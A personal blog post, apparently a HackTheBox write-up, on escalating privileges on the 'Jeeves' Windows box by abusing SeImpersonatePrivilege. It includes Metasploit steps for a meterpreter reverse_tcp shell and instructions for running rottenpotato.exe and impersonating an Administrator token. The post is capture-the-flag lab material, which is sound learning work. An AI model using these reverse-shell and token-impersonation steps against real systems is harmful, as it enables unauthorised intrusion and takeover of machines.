Hello Everyone! This is Shreya Pohekar. This is a follow-up blog from jeeves from hackthebox. Jeeves is a medium windows box. The writeup can be found out here.
This blog post depicts yet another way to priv esc to Administrator. The pre-requisite is to have a user shell.
When I ran a whoami /priv , It listed all the privileges the user has. And SeImpersonatePrivilege being enabled was something that caught my eye
Since privilege escalation via this method was unintended way, I am covering this exploit as an independent blog where we’ll be learning what exactly is this privilege and how it can be exploited.
So lets get started.
As the screenshot suggests, when the SeImpersonatePrivilege is enabled for any normal user, he is able to Impersonate a client having higher privileges after he successfully authenticates. In a nutshell, we as a normal user can escalate our privileges to nt authority. Sounds interesting right??
So how do the Privilege Escalation works?
The privilege escaltion with SeImpersonateprivilege is broken down in 3 steps as follows:
- Trick the SYSTEM account to authenticate via NTLM to an endpoint that is controlled by us.
- intercept this authentication attempt and locally negotiate security token for SYSTEM account.
- Impersonate the tokens that are just been negotiated via MITM. For token impersonation to work, SeImpersonatePrivilege is a must.
To read about the internals of this exploit, do read the blog by foxglovesecurity
Abusing the privilege with metasploit
Working with metasploit is pretty simple as it comes handy with builtin methods that saves us from a lot of repetitive task.
If you have a basic user shell, switch to meterpreter shell with the following commands:
- use exploit/multi/script/web_delivery
- set target 2
- set payload windows/meterpreter/reverse_tcp
- set lhost tun0
- set srvhost <your ip add>
Running exploit generates a powershell script that has to be copied to the already spawned shell. Once the powershell payload gets executed on the previously obtained shell, you get a meterpreter.
Now we’ll run load incognito. This tool is used to escalate privileges inside Active Directory environments. With incognito, we are able to impersonate authenticated tokens on the target windows machine.
The tokens can be listed with the command list_tokens -u (for users) and list_tokens -g ( for groups). But the commands wont list any impersonation token because we havent yet tricked the Administration to authenticate.
Let’s generate tokens
The exploit of the scenerio can be achieved with an exe, rottenpotato.exe that does the actual working of tricking the Administrator via NTLM. The file can be downloaded from here. Now we have to upload the exe to the meterpreter shell. It can be easily done via upload command. Then execute the exe with execute -cH -f potato.exe
Once the exe gets executed, we can again list the tokens, if generated in the process.
Volla! We have got impersonation tokens now. And to our interest, BUILTIN\Administrators has a Impersonation token available. So let’s impersonate it.
With impersonate_token module, the account of any user can be mimed
After impersonation, we get the shell as nt authority\system.
That’s all for this blog post. Hope you enjoyed reading.
Until then, Happy Hacking!!